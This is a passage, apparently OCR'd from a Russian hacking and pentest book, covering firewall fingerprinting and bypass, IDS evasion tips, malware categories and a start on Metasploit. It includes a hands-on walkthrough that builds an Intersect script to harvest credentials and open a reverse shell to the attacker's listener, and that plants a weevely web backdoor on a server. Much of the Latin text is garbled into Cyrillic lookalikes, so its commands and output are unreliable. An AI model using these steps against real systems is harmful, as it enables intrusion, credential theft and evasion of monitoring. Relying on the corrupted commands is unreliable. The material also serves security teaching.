мацию и предотвращают сокрытие одного типа трафика под видом другого. 

4. Многоуровневые брандмауэры объединяют в себе все три вышеописанные 
технологии. 

Для того чтобы определить стратегию обхода брандмауэра, нам необходимо прежде 
всего узнать его тип, а еще лучше — конфигурацию. В некоторых случаях достаточ¬ 
но просто подключиться к определенному порту, используя обыкновенный ісіпет, 
получить баннер и таким образом узнать, что за оборудование перед нами. Даже по 
самому факту наличия открытых портов можно установить тип оборудования — на¬ 
пример, у брандмауэров СЬеск Роіпі; по умолчанию открыты ТСР-порты 256-259. 

Автоматизировать данный процесс можно при помощи утилиты Рігеѵѵаік или 
і\'тар. Рассмотрим оба способа. 

Рігехѵаік посылает ТСР и I![)Р с увеличенным на единицу ТТБ. Это значит, что, 
пройдя через брандмауэр, пакет будет уничтожен, а мы получим ответ ІСМР_ 
ТІ М Е_ЕХС Г НГ) ГЛ ). А в случае, когда трафик будет заблокирован брандмауэром, 
мы не получим никакого ответа. 

В самом начале Рігетѵаік определит количество транзитных шлюзов (Ьор) до цели, 
чтобы потом можно было выставить нужный ТТБ, а затем проведет сканирование. 

гоо1:@ка1і:~# Тігеіліаік -51024 -і еТН0 -п -рТСР 192.168.1.1 192.168.10.1 
Рігемаік 5.0 [§аіеиау АС! зсаппег] 

Рігемаік зТаТе іпіТіаІігаТіоп сотрІеТесІ 5иссе55ри11у. 

ТСР-ЬазесІ 5сап. 

Катріп§ рНазе зоигсе рогТ: 53, сІезТіпаТіоп рог!: 33434 
НоТТооТ ТНгои@!і 192.168.1.1 и5Іп§ 192.168.10.1 аа а теТгіс. 

Катріп§ РНазе: 

1 (ТП 1): ехрігесі [192.168.1.1] 

ВіпсІіп§ РюбТ геасНесІ. 

5сап Ьоипсі а! 2 (іорз. 

5саппіп@ РИаае: 
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рогѣ 21: *по гезропзе* 

рогѣ 25: А! ореп (рогѣ поѣ Іізѣеп) [192.168.10.1] 
рогѣ 80: А! ореп (рогѣ поѣ 1і5ѣеп) [192.168.10.1] 
5сап сотріеѣесі зиссеззѣиііу. 


Использование >йпар. Как вы уже заметили, Кт ар представляет собой достаточно 
мощный инструмент, а благодаря подключаемым модулям его можно заставить 
сделать практически все, в том числе и определить конфигурацию брандмауэра. 

Логика работы точно такая же, как и при использовании Рігеіѵаік, рассмотрим ее 
на примере: 

птар --5спірѣ=-Рігема1к --ѣпасегоиѣе 192.168.32.12 -р1-65535 

5ѣагѣіп§ КІтар 7.30 ( Иѣѣрх ://птар.ог§ ) аѣ 2016-11-13 01:39 Е5Т ІЧтар зсап перогѣ 
ѣоп 192.168.32.12 
Но5ѣ І5 ир (0.00265 Іаѣепсу). 

N01 5І10МП: 965 СІ05ѲСІ рогѣ5 
РОКТ 5ТАТЕ 5ЕКѴІСЕ 

80/ѣср ореп Нѣѣр 

135/ѣср ѣііѣегесі тзгрс 

139/ѣср ѣііѣегесі пеѣЬІ05-55П 
445/ѣср ѣііѣегесі тіспо5оѣѣ-сІ5 
1720/ѣср ѣііѣегесі Н.323/д.931 
49153/ѣср ѣііѣегесі ипкпомп 
49154/ѣср ѣііѣегесі ипкпомп 
49155/ѣср ѣііѣегесі ипкпомп 
49156/ѣср ѣііѣегесі ипкпомп 

Н05Ѣ 5СПІрѢ ГѲ5и1ѣ5: 

| ѣіпемаік: 

I НОР Н05Т РКОТОСОѢ ВЮСКЕР Р0КТ5 

|_0 192.168.1.100 Ѣср 111,135,139,445,1720,2000,5060,49152-49156 

ТКАСЕКОІЛЕ (и5Іп§ рогѣ 1025/ѣср) 

НОР КТТ АЭРКЕ55 
1 2.15 Ш5 192.168.32.12 

Теперь, когда мы получили необходимые данные о брандмауэре, рассмотрим ме¬ 
тодики его обхода. 

Подмена ІР-адреса. Достаточно эффективный метод обхода, в этом случае ата¬ 
кующий подменяет свой адрес адресом хоста, с которого разрешено подключение. 
В Ьіпих можно подменить свой ІР-адрес, используя ірІаЫез. Однако необходимо 
учитывать то, что таким образом можно только отправить пакет, получить ответ 
от сервера будет невозможно. 

ірѣаЬ1е5 -ѣ паѣ -А Р05ТР01ІТІМС -р істр -] БИАТ --ѣо-5оигсе 192.168.10.210 


Изменение пути. Используя этот прием, атакующий сам определяет путь, по кото¬ 
рому должен пройти пакет. В этом случае он должен полностью представлять себе 
топологию внутренней сети. Обладая всей информацией, он сможет осуществлять 
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коммуникацию даже с такими хостами, которые, по идее, не должны быть доступны 
извне. 

Использование ІР-адресов. Некоторые брандмауэры анализируют только ІЖЬ, 
по которому осуществляется запрос. Если его заменить на ІР-адрес, то такой запрос 
легко пройдет через систему защиты. 

ІСМР-туннель. Еще один способ обхода брандмауэра — создание ІСМР-туннеля. 
Такая возможность появилась благодаря тому, что в стандарте хоть и описана 
структура пакета, но не сказано, какие данные могут в нем находиться. Поэтому 
атакующий может передавать при помощи ІСМР любую информацию. Например, 
он может заставить сервер соединиться с хостом, находящимся во внешней сети, 
или отправить вирус. Для создания таких туннелей можно использовать Еокі, 
007зЬе11 или КСоѵсгі:. 

АСК-туннель. Основная идея этого метода состоит в том, что некоторые брандма¬ 
уэры не проверяют пакеты, в которых установлен АСК-флаг. Это сделано потому, 
что, по мнению брандмауэра, АСК используется в пакетах той сессии, которая была 
разрешена ранее. 

НТТР-туннель. Основная идея заключается в том, что множество сервисов ис¬ 
пользует НТТР, и брандмауэр разрешает ему проходить в обоих направлениях. 

Приманки 

Одна из самых интересных, на наш взгляд, систем, которые можно встретить во 
внутренней сети организации. Приманки (ЬопеуроГз) — это специальные системы, 
основной задачей которых является привлечение внимания атакующего. 

Обычно они представляют собой отдельностоящие серверы или даже несколько 
серверов, объединенных для выполнения определенной задачи. Например, сервер 
приложений, он же может быть веб-сервером, сервер базы данных и сервер авто¬ 
ризации. Они похожи на реальные серверы и могут даже выполнять какие-либо 
задачи. Их отличие только в том, что они отделены от основной сети и к ним про¬ 
ще получить доступ, но при этом они не содержат никакой информации, получив 
которую злоумышленник мог бы скомпрометировать организацию. 

Несмотря на то что доступ к ним осуществить легче, чем к любому другому сегмен¬ 
ту сети, за ними пристально следят. Ведь полученная от них информация позволяет 
оперативно узнавать о нелегитимных процессах, происходящих во внутренней сети. 
А это позволит предотвратить попытки взлома настоящих систем. 

Резюме 

Важно помнить, что практически все администраторы, в большей или меньшей 
степени, защищают свои серверы. Обычно это происходит при помощи набора 
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программных и аппаратных средств. Учтите, что если вы не предпримете никаких 
мер, то в лучшем случае ваша атака будет заблокирована автоматически, а в худ¬ 
шем — данным случаем могут заняться персонально. 

Системы обнаружения атак (11)8) анализируют файлы, трафик, данные журналов 
аудитации, а также используют статистические методы анализа. Их можно попы¬ 
таться обойти следующим образом: 

□ Модификация существующих или использование нестандартных методов атак; 

□ Поиск и использование плохо известных особенностей сетевых протоколов; 

□ Перегрузка ГО5 ложными событиями поможет скрыть ваши действия; 

□ Атака, направленная на вызов отказа в обслуживании (БоЗ); 

□ Фрагментация пакетов не позволит ІБ5 проанализировать данные; 

□ Изменяйте буквы в командах и запросах на символьные коды — это поможет 
обойти сигнатурный фильтр; 

□ Используйте шифрование — часто случается так, что ГО 5 не могут проанали¬ 
зировать такой трафик; 

Брандмауэры, как вы помните, предназначены для отделения сетей друг от друга, 
прежде всего внешней от внутренний. На данный момент самыми популярными 
являются фаерволы, которые объединяют в себе пакетную фильтрацию, отслежи¬ 
вание соединений и анализ передаваемых данных. 

Для анализа конфигурации фаервола используйте і\'піар или Ріге\ѵа1к. 

Обойти защиту фаервола можно, просто подменив свой ІР адрес, однако такой 
метод не всегда эффективен, гораздо лучше работают приемы, в которых исполь¬ 
зуется туннелирование. 

Остерегайтесь приманок — серверов, созданных для привлечения злоумышленни¬ 
ков: они легкодоступны и позволят администраторам вычислить вас. 



Вредоносные программы 


Понятие «вредоносные программы» достаточно обширно и включает в себя мно¬ 
жество видов специализированного ПО, среди которого выделяют: вирусы, тро¬ 
янских коней, логические бомбы, червей, шпионов и многое другое. Несмотря на 
бурное развитие антивирусов, вредоносные программы до сих пор представляют 
большую угрозу любой ИТ-инфраструктуре и ежегодно приносят большие убытки 
организациям различного размера. 

В настоящее время программы данного типа конструируются таким образом, 
чтобы оставаться незамеченными для пользователя и антивирусных программ. 
Часть из них использует вычислительные ресурсы компьютера жертвы в целях 
получения выгоды атакующим. Зараженный компьютер может являться частью 
распределенной системы вычислений или стать частью ботнета и совершать рас¬ 
пределенные атаки. 

Вредоносные программы также позволяют шпионить за пользователем. Некоторые 
виды такого ПО могут отслеживать все нажатия клавиш, делать снимки экрана, 
определять запущенные процессы и программы. ПО такого типа разрабатывается 
и вполне официальными компаниями. Организации используют его для слежения 
за тем, как сотрудники используют свое рабочее время. 

Еще одна разновидность данных программ занимается вымогательством. Они 
могут шифровать данные не только на компьютере жертвы, но и на доступных ей 
сетевых ресурсах. Также атаке могут подвергнуться и загрузочные сектора. После 
шифрования жертве предлагается перечислить определенную сумму денег на счет 
атакующего, в противном случае его файлы могут быть безвозвратно потеряны. 

Далее мы рассмотрим подробнее различные виды вредоносных программ. 

Вирусы 

Наверное, самый старый и хорошо известный тип вредоносных программ. Так что 
же позволяет выделить его в самостоятельную категорию? Если не углубляться 
в детали, то вирус — это самореплицирующаяся программа, способная внедряться 
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в другую программу. Некоторые из них начинают работать сразу же после того, как 
были запущены, другие ждут определенного события — это может быть какая-либо 
дата или команда извне. 

Основными видами деятельности вирусов являются: изменения данных, инфици¬ 
рование программ, саморепликация, самошифрование, изменение параметров ПО, 
уничтожение данных, повреждение оборудования, полиморфизм. Хотим заметить, 
что это далеко не полный список. Ежедневно появляются вирусы, обладающие 
новым набором характеристик, мы привели лишь самые яркие примеры. 

В классическом понимании у вируса есть свой жизненный цикл, в котором обычно 
выделяют шесть стадий. 

1. Разработка. Подразумевает создание вируса, во время которого автор пишет его 
самостоятельно или использует один из широкодоступных генераторов вирусов. 

2. Репликация. После распространения вируса автором он начинает самостоя¬ 
тельно делать свои копии. Исходя из заложенных автором инструкций, вирус 
может создавать свои копии на машинах жертвы, а также пытаться заразить 
другие компьютеры. 

3. Исполнение. Вирус начинает делать то, что хотел его создатель. Это может быть 
шифрование или уничтожение данных, осуществление атак на удаленный хост 
и многое другое. 

4. Обнаружение. Через какое-то время о существовании вируса становится из¬ 
вестно разработчикам антивирусного ПО, которые начинают разработку ин¬ 
струментов, позволяющих бороться с ним. 

5. Добавление. Создатели антивирусного ПО находят способ борьбы с вирусом 
и создают обновление для своих продуктов или специальные инструменты, 
которые становятся доступными широкому кругу пользователей. 

6. Подавление. Антивирусы, получившие последние обновления, обретают способ¬ 
ность обнаруживать и подавлять вирус. 

Следует заметить, что не все вирусы похожи друг на друга. Несмотря на общий 
жизненный цикл, искусно написанные вирусы существенно отличаются один от 
другого. Они могут распространяться не только через компьютерные сети, но и по¬ 
средством таких носителей, как внешние ЕГЗВ-накопители. Могут заражать как 
исполняемые файлы, так и файлы библиотек динамической компоновки. Копии 
одного и того же вируса могут содержать разный код и выполнять различные дей¬ 
ствия, что сильно затрудняет его обнаружение. 

Итак, мы разобрались с понятием и жизненным циклом вируса, теперь рассмотрим 
его основные типы. 

1. Вирусы загрузочного сектора. Заражают основной загрузочный сектор (МВК.) 
компьютера жертвы. Могут изменять ход загрузки компьютера, что приводит 
к загрузке вируса до старта операционной системы и средств защиты. 
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2. Макросы. Являются частью таких широко используемых программ, как 
МісгозоЛ Ехсеі и \ѴопІ. Это скрипты, которые пишутся на языке ѴВА с целью 
облегчить и автоматизировать определенные процессы. Однако этот язык по¬ 
зволяет делать все то же, что и любой другой, а это значит, что на нем можно 
так же эффективно писать вирусы. 

3. Кластерные вирусы. Изменяют таблицы расположения файлов на жестком 
диске таким образом, что вместо открытия нужного файла пользователь будет 
запускать вирус, и только после этого вирус запустит нужный пользователю 
файл, да и то не всегда. 

4. Скрытые. Используют различные механизмы, которые помогают избежать 
обнаружения антивирусами. 

5. Зашифрованные. Шифруют сами себя во избежание обнаружения антивируса¬ 
ми. Интереснее всего то, что алгоритм шифрования может меняться. 

6. Перезаписывающие. Умеют внедряться в другой файл, что затрудняет их обна¬ 
ружение. Некоторые вирусы могут даже подменять данные о реальном размере 
файла, дабы пользователь или антивирус не заметил происшедших изменений. 

7. Редко проявляющиеся. Такие вирусы активируются, скажем, только после каж¬ 
дого пятнадцатого запуска или заражают только файлы строго определенного 
размера. Все это затрудняет их обнаружение. 

8. Подражающие. Пытаются выдать себя за обычное ПО. Например, если на ком¬ 
пьютере присутствует файл \ѵогс1.ехе, такой вирус создаст файл с названием 
ѵѵопі.согп, который будет запускаться перед стартом ѵѵопі.ехс. 

9. Логические бомбы. Срабатывают только при определенных условиях. Это ус¬ 
ложняет их обнаружение, поскольку до наступления определенного события 
они никак не проявляют себя. 

10. Множественные. Используют для заражения различные векторы атак. Могут 
заразить загрузочный сектор или исполняемые файлы и создать множество 
своих копий. Это затрудняет их обнаружение и удаление. Если такой вирус не 
уничтожен полностью, он может воссоздать свои недостающие части. 

11. Криптовирусы. Шифруют определенные файлы на диске жертвы. За расшиф¬ 
ровку таких данных пользователю приходиться платить злоумышленнику. 

Черви 

Еще одна большая категория, характерная тем, что входящее в него ПО использует 

все возможности компьютерных сетей и сетевых сервисов для своей репликации 

и распространения. 

В отличие от вирусов, основной характеристикой червей является их нацеленность 

на саморепликацию и распространение. Их основной особенностью является от- 
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сутствие нацеленности на заражение каких-либо файлов, а также зависимости 
функционирования от действий пользователя. Они молниеносно распространя¬ 
ются по сети, генерируют много сетевого трафика и потребляют значительное 
количество ресурсов. 

Черви могут содержать в себе вирус и заражать машины жертв, а также обладают 
способностью передавать данные с зараженных машин на сервер атакующего. Чаще 
всего для своего распространения они используют уязвимости в установленном 
ПО, однако не заражают его, чем существенно отличаются от вирусов. 

Шпионы 

Этот тип ПО создан для того, чтобы собирать всю возможную информацию о поль¬ 
зователе и передавать ее атакующему. Разумеется, шпионы устанавливаются на 
компьютер жертвы без ее ведома и работают скрытно. 

Заражение шпионами может происходить множеством путей — они могут входить 
в состав другого, обычно бесплатного ПО и устанавливаться вместе с ним, а также 
могут пересылаться по электронной почте, устанавливаться на компьютер жертвы 
непосредственно атакующим и многими другими путями. 

Рекламное ПО 

Основное его предназначение — показ рекламы на компьютере жертвы. Обычно 
реклама показывается в виде всплывающих окон, также она может изменять до¬ 
машнюю страницу браузера. Обычно распространяется через уязвимые интернет- 
обозреватели или в составе инсталляторов бесплатных программ. 

Троянские кони 

Основной задачей троянских коней является обеспечение доступа атакующего 
к компьютеру жертвы. Такие программы стараются тщательно скрываться от анти¬ 
вирусов и никоим образом не раскрывать свое присутствие. 

Используя троянского коня, атакующий может украсть информацию, установить 
стороннее ПО, загрузить или изменить файлы, а также следить за работой пользо¬ 
вателя. Безусловно, для исполнения удаленных команд атакующего необходима 
среда передачи данных. Троянские кони могут осуществлять коммуникацию, ис¬ 
пользуя два типа каналов: легитимные — например, предавать данные по НТТР, 
и скрытые, когда ПО создает свой собственный канал. 

Троянских коней можно условно разделить на несколько типов: 

1. Обеспечивающие атакующему удаленный доступ и управление компьютером 
жертвы. 
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2. Сборщики данных, отправляющие атакующему данные определенного типа, 
например файлы с хешами паролей. 

3. Прокси, превращающие компьютер жертвы в промежуточный узел, использу¬ 
емый для коммуникации с другими компьютерами. 

4. Файловые серверы, позволяющие хранить на компьютере жертвы любое ПО 
с целью его распространения на другие компьютеры. 

Многие троянские кони используют для своей работы одни и те же порты, поэтому 
выявить их можно любым сканером портов, например Мшар. После того как в сети 
найдена зараженная троянским конем машина, к нему можно подключиться и ис¬ 
пользовать его для своих целей. 

Ниже мы приведем названия некоторых троянских коней и диапазон портов, ко¬ 
торые они используют для коммуникации: 

□ Васк ОгіГісс — ВТОР 31337 или 31338; 

□ ИеШиз - ТСР 12345 и 12346; 

□ КеасЬоиІ — ТСР 43188; 

□ ТішЬикіи - ТСР/ІГОР 407. 

Практическая часть 

Теперь, когда мы разобрали все в теории, перейдем к практической части. В данном 
разделе мы не будем рассматривать создание вируса или троянского коня с нуля. 
Это потребует углубленного знания какого-либо языка программирования. Оста¬ 
новимся на конструкторах, которые позволяют создать такое ПО без навыков 
программирования. 

Следует подчеркнуть, что хотя это и самый простой способ, однако не самый на¬ 
дежный. Конструкторы обладают большими возможностями, но при этом огра¬ 
ничивают нас конечным набором функций. К тому же они создают достаточно 
стандартный код, который научились определять многие антивирусы. Впрочем, от 
этого недостатка можно избавиться, и чуть позже мы покажем вам как. 

Первый конструктор, который мы рассмотрим, — Іпіегзесі. Основное его при¬ 
менение — автоматизация сбора данных на скомпрометированном компьютере. 
Предположим, что вы получили доступ к командной строке. После этого, исполь¬ 
зуя I пгегяесі: и создав с его помощью скрипт, вы сможете быстро собрать данные 
о пользователях, скопировать 881 [-ключи, собрать информацию о сети, установить 
постоянную обратную связь и многое другое. 

Продемонстрируем его работу. Для начала запустим пеісаі, который будет при¬ 
нимать данные на порт 4444. 


гоо1:@ка1і:~# пс -1 -р 444 
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Теперь запустим I піегхесі: и определим доступные модули. 

ІпТегзесТ 2.5 - 5сгірТ СгеаТіоп ІІТіІіТу 


1 = > СгеаТе СизТот 5сгірТ 

2 = > ЬізТ АѵаіІаЬІе Мосіиіез 

3 = > ЬоасІ Р1и@іп Мосіиіе 

4 = > ЕхіТ СгеаТіоп ІІТіІіТу 


=> 


2 


ІпТегзесТ 2.5 - 5сгірТ СгеаТіоп ІІТіІіТу 
- ЬІ 5 Т оТ ІпТегзесТ Мосіиіез - 

БТапсіагсі Мосіиіез: 

агсНіѵе сгесІ5 ехТгаз пеТмогк геѵегзехог зсгиЬ 
ЬзЬеІІ сіаетоп Іаптар озизег гзЬеІІ хогзЬеІІ 

СизТот Мосіиіез: 

аезЬТТр §еТгероз орепзЬагез рогТзсап зпіТТ меЬргоху хтрр 

е§геззЬизТег істрзЬеІІ регзізТепТ ргіѵезс исІрЬіпсІ хтісгаск 


1 => КеТигп То таіп тепи. 

=> 1 

Получим больше информации об интересующем нас модуле. 

=> :іпТо гзЬеІІ 

РезсгірТіоп: Орепз а геѵегзе ТСР зЬеІІ То а гетоТе ЬозТ. ІпТегасТіѵе зЬеІІ иіТЬ 
сіоипіоасі/иріоасі апсі гетоТе ІпТегзесТ тосіиіе ехесиТіоп. 

АиТЬог: оЬсіае [ЬіпсІ5Ііе11@1іѵе.сот] 

= > : чиіТ 

Создадим собственный скрипт. 

ІпТегзесТ 2.5 - 5сгірТ СгеаТіоп ІІТіІіТу 


1 => СгеаТе СизТот 5сгірТ 

2 => ЬізТ АѵаіІаЬІе Мосіиіез 

3 => ЬоасІ Р1и@іп Мосіиіе 

4 => ЕхіТ СгеаТіоп ІІТіІіТу 


=> 


1 


ІпТегзесТ 2.0 - 5сгірТ СепегаТіоп ІІТіІіТу 
- СгеаТе СизТот 5сгірТ - 
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ІпзТгисТіопз: 

Іізе і;Ме сопйоіѳ Ьеіом -Го сгеаТе уоиг сизТот 
ІпТегзесТ зсгірТ. Туре ТЬе тосіиіез уои мізЬ 
То асісі^ ргеззіп§ [епТег] аГТег еасЬ тосіиіе. 

Ехатріе: 

=> сгесіз 
=> пеТмогк 

ІлІЬеп уои Ьаѵе епТегеЬ аіі уоиг сіезігес) тосіиіез 

іпТо ТЬе лиеие, зТагТ ТЬе Ьиіісі ргосезз Ьу Туріп§ : сгеаТе. 

** То ѵіем а Гиіі ІізТ оТ аіі аѵаіІаЬІе соттапсіз Туре : Гіеір. 

ТГіе соттапсі :яиіТ мііі геТигп уои То ТМе таіп тепи. 

=> сгесіз 

сгесіз асісіесі То лиеие. 

=> гзЬеІІ 

гзЬеІІ асісіесі То лиеие. 

=> пеТмогк 

пеТмогк асісіесі То риеие. 

=> зсгиЬ 

зсгиЬ асісіесі То лиеие. 

=> озизег 

озизег асісіесі То лиеие. 

=> іасТіѵе 

МоЬиІез уои Ьаѵе зеІесТесі: 

['сгесіз', ' гзГіеІІ' і 'пеТмогк', 'зсгиЬ', 'озизег'] 

=> :сгеаТе 

Введем необходимую информацию. 

[ 5еТ ОрТіопз ] 

ІТ апу оТ ТЬезе орТіоп5 сІоп’Т арріу То уои, ргезз [епТег] То зкір. 

ЕпТег а пате Гог уоиг ІпТегзесТ зсгірТ. ТЬе ГіпізЬесІ зсгірТ мііі Ье ріасесі іп ТГіе 
ЗсгірТз сІігесТогу. Ро пот іпсіисіе РуТІіоп Гііе ехТепзіоп. 

=> ТѲЗТІЗ 

ЗсгірТ мііі Ье заѵесі аз /изг/зЬаге/іпТегзесТ/ЗсгірТз/ТезТіз. ру 

БресіГу ТЬе сІігесТогу оп ТНе Таг§еТ зузТет мЬеге ТЬе §аТЬегес! Гііез апсі іпГогтаТіоп 
мііі Ье заѵесі То. 

*ІтрогТапТ* ТЬіз зЬоиІсІ Ье а N ЕЫ сІігесТогу. ІлІЬеп ехітіп@ ІпТегзесТ, ТЬіз ЬігесТогу 
мііі Ье ЬеІеТесІ ІГ ІТ сопТаіпз по Гііез. 

ІГ уои зкір ТЬІ5 орТіоп, ТЬе ЬеГаиІГ (/Ттр/1іГТ+$гапсІот5Ггіп§) мііі Ье изесі. 

Тетр сІігесТогу => /Ттр/ізесТ 
епаЫе 1о§§іп§ => 

Ьіпсі рогТ = > 

[+] Ьіпсі рогТ заѵесі. 

гетоТе ЬозТ => 192.168.225.128 
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[+] гетоТе Мозг заѵесі. 
гетоіе рогТ => 4444 

[ + ] гетоТе рогТ заѵесі. 
ргоху рогТ = > 
хог сірЬег кеу => 

СРѲСІ5 

гзііеіі 

пеімогк 

зсгиЬ 

озизег 

[+] Ѵоиг сизіот Іпіегзесі зсгірі: Наз Ьееп сгеаіесі! 

ЬосаТіоп : /изг/зЬаге/іпТегзесІі/ЗсгірІіз/ТезТіз . ру 

Запустим наш скрипт на машине жертвы и заставим ее выполнить соединение 
с нашим компьютером. 

гооТ@тіп1: /ТезТіз . ру --гзііеіі 

[!] Керогіз мііі Ье заѵесі іп: /ітр/ізесі: 

Убедимся в том, что соединение произошло. Мы увидим это в том терминале, 
в котором был запущен пеіхаі:. 

гоо1:@ка1і :~# пс -1 -р 4444 
[ + ] Ией соппесТіоп езіаЫізНесІ ! 

Іпіегзесі: /ітр/ізесі: = > шііоаті 
гооТ 

Іпіегзесі: /ітр/ізесі: = > 

Теперь рассмотрим ситуацию, когда мы не получили доступа к консоли, однако он 
нам очень нужен. Все, что мы можем сделать в этом случае, — загрузить файл на 
сервер, используя уязвимость в веб-приложении. 

Создадим веб-приложение, которое поможет нам получить доступ к командной 
строке. 

гоо1:@ка1і :~# иеЬасоо -о ЬасЫоог.рЬр 

ІлІеВаСоо 0.2.3 - ЫеЬ ВасЫоог Соокіе Зсгірі-Кіі 
Соругі§Ы (С) 2011-2012 Апезііз ВесЫзоиЫз 

{ (ЭапезіізЬ | апез1:і5@ЬесЫ:50іісІІ5. сот | Ы:1:р(5) : //ЬесЫзоисііз . сот } 

[+] ВасЫоог Тііе "ЬасЫоог.рЬр" сгеаіесі. 

Теперь загрузим его на сервер, к которому мы хотим получить доступ, и подклю¬ 
чимся к нашему приложению. 

гооі:@ка1і :~# иеЬасоо -і -и ЫХр://инн.тусогр. сот/ЬасксІоог .рЬр 

ІлІеВаСоо 0.2.3 - ЫеЬ ВасЫоог Соокіе Зсгірі-Кіі: 

Соругі§М: (С) 2011-2012 Апезііз ВесЫзоиЫз 

{ (ЭапезіізЬ | апезі:і5@ЬесМ:5оисІІ5. сот | Ы:1:р(5): //ЬесЫзоиЫз . сот } 



150 Глава 10 • Вредоносные программы 


[+] СоппесІ:іп§ Іо гетоТе зегѵег аз... 

иісІ=5006(меЬЗ) §ісІ=5005(с1іеп1;1) §гоирз=5005(с1іеп1:1),5002(55Іиі5ег5) 

[*] Туре ’ІоасГ То изе ап ехТепзіоп тосіиіе. 

[*] Туре ' :<стсі>' То гип Іосаі 05 соттапсіз. 

[*] Туре ’ехіТ' То лиіТ Тегтіпаі. 

меЬасоо$ мііоаті 
меЬЗ 

меЬасоо$ ісі 

иісІ=5006(меЬЗ) §ісІ=5005(с1іепТ1) §гоир5=5005(с1іепТ1) л 5002(53Ііи5ег5) 
меЬасоо$ 


Резюме 

Понятие «вредоносные программы» объединяет в себя множество типов зловред¬ 
ного ПО, такого как вирусы, троянские кони, черви, шпионы и т. д. 

Основными целями такого ПО чаще всего являются: изменение и кража данных, 
предоставление несанкционированного доступа, порча данных, вымогательство, 
распространение своих копий на другие машины сети. 

В наши дни при помощи специальной программы-конструктора создать вирус 
может каждый. Однако ПО, созданное таким путем, содержит в себе достаточно 
стандартный код, который легко распознается даже самыми технически отсталыми 
антивирусами. 

Создание действительно хорошего ПО требует углубленного знания программи¬ 
рования и информационной безопасности. 



Меіазріоіі Ргатеѵѵогк 


і\1 еі:аяр1 оіс Ргате\ѵогк — это программная платформа, созданная для разработки, 
тестирования и применения эксплойтов. МеТазрІоі!: был создан в 2003 году как 
инструмент для тестирования сетевой безопасности, а в 2007-м был полностью 
переписан на языке программирования КиЪу. В настоящее время активно поддер¬ 
живается и развивается компанией К,арісІ7, предлагающей две версии продукта — 
платную и бесплатную, рассмотрением которой мы займемся далее. 

Почему же мы решили посвятить целую главу описанию одного программного 
продукта? Во-первых, это очень динамично развивающийся проект, который по¬ 
стоянно поддерживается и регулярно обновляется, что является жизненной необ¬ 
ходимостью в столь динамично меняющемся мире информационной безопасности. 
Во-вторых, он содержит необходимые инструменты для разработки и создания 
эксплойтов, благодаря чему этот процесс стандартизируется, равно как и приме¬ 
нение программ данного типа. 

Стоит сказать, что Меіазріоіі уже давно вышел за рамки разработки и применения 
эксплойтов. В данный момент его можно использовать на всех стадиях аудита без¬ 
опасности. В нем есть инструменты для активного и пассивного сбора информации, 
свой сканер уязвимостей, а также инструменты для последующего проведения 
атаки и закрепления в системе. 

В Интернете можно найти бесплатные курсы и книги, посвященные Меіазріой, 
поэтому нашей задачей не является обучить вас всем тонкостям использова¬ 
ния этого замечательного продукта. Мы хотим остановиться лишь на самых 
основных моментах и пробудить в вас интерес к дальнейшему самостоятельному 
обучению. 


Интерфейс 


Пожалуй, это то, с чего стоит начать. Тем более что МеТазрІоіі: предлагает несколько 
вариантов взаимодействия, как в графическом, так и в текстовом режиме. 
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В Меіазріоіі есть два различных варианта командного интерфейса. Первый — это 
пізГсІі, однако мы не будем тратить время на его рассмотрение, так как с середины 
2015 года его поддержка прекращена. 

Второй вариант — это использование тзісопзоіе. Мзісопзоіе, наверное, самый по¬ 
пулярный вид интерфейса Меіазріоіі Італіеѵѵогк. Он позволяет быстро и удобно 
воспользоваться всеми функциями и возможностями Меіазріоіі. Кроме того, 
в тзісопзоіе есть возможность использовать не только собственные инструменты, 
но и сторонние утилиты. 

Для работы с шзісопзоіе существует свой набор команд. Просмотреть их все, а так¬ 
же получить краткую справку можно, используя команду Ьеір. Разумеется, вы не 
запомните сразу названия всех команд и модулей. Главное — помнить хотя бы 
первые символы названия команды, так как после их введения и нажатия клавиши 
ІаЪ консоль сама допишет окончание. 

Теперь продемонстрируем запуск фреймворка и вывод справки по встроенным 
командам: 

гооГ@ка1і:~# тзГсоп5о1е 

МеГазрІоіГ Рагк, ЗузГет 5есигіГу ІпГегГасе 
Ѵегзіоп 4.0.5, АІрЬа Е 
Кеасіу... 

Такіп§ поГез іп поГерасІ? Наѵе МеГазрІоіГ Рго Ггаск & герогГ 

уоиг рго§гезз апсі ГіпсІіп§5 -- Іеагп тоге оп ІтМір://гарісІ7.сот/те1:а5р1оі-|: 

= [ теГазрІоіГ ѵ4.12.34-сіеѵ ] 

+ -- -- = [ 1593 ехрІоіГз - 906 аихіііагу - 273 розГ ] 

+ -- -- = [ 458 рауіоасіз - 39 епсосіегз - 8 порз ] 

+ -- -- = [ Ргее МеГазрІоіГ Рго ГгіаІ: ЬГГр://г-7.со/Ггутзр ] 

тзГ > Ьеір 

Соге Соттапсіз 


СоттапсІ 

ЭезсгірГіоп 

? 

Неір тепи 


асіѵапсесі 

Эізріауз асіѵапсесі орГіопз Гог опе ог 

тоге тосіиіез 

Ьаск 

Моѵе Ьаск Ггот ТЬе сиггепГ сопГехГ 


Ьаппег 

Эізріау ап амезоте теГазрІоіГ Ьаппег 


ССІ 

СЬап@е ТЬе сиггепГ могкіп@ сІігесГогу 


соіог 

То§§1е соіог 


соппесГ 

СоттипісаТе міГЬ а ЬозГ 


есііі: 

ЕсІіТ ГЬе сиггепГ тосіиіе міГЬ $ѴІ51ІАІ_ 

ог $ЕЭІТОК 

ехіГ 

ЕхіГ ГЬе сопзоіе 


еег 

6еГз ГЬе ѵаіие оГ а сопГехГ-5ресіГіс 

ѵагіаЬІе 

8еГ§ 

6еГз ГЬе ѵаіие оГ а §1оЬа1 ѵагіаЬІе 


§гер 

бгер ГЬе оиГриГ оГ апоГЬег соттапЬ 


Иеір 

Неір тепи 
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іпРо 

ігЬ 

]ОЬз 

кііі 

Іоасі 

ІоасіраіЬ 

такегс 

ОрІІОПЗ 

рорт 

ргеѵіоиз 

ризЬт 

риіі 

ге1оасі_а11 

гепате_]оЬ 

гезоигсе 

гоиіе 

заѵе 

зеагсЬ 

5Ѳ55 

ЗѲЗЗІОПЗ 

ЗѲІ 

5еі§ 

ЗЬОИ 

5Іеер 

ЗрООІ 

Тікігеасіз 

ипіоасі 

ипзеі 

ипзеі§ 

изе 

ѵегзіоп 


Різріауз іпРогтаііоп аЬоиі опе ог тоге тосіиіез 
Ргор іпіо ігЬ зсгірііп§ тосіе 
Різріауз апсі тапа§ез ]оЬз 
Кііі а зоЬ 

І_оасі а Ргатемогк р1и§іп 

ВеагсЬез -Рог апсі Іоасіз тосіиіез -Ргот а раіЬ 

5аѵе соттапсіз епіегесі зіпсе зіагі іо а -Рііе 

Різріауз §1оЬа1 орііопз ог -Рог опе ог тоге тосіиіез 

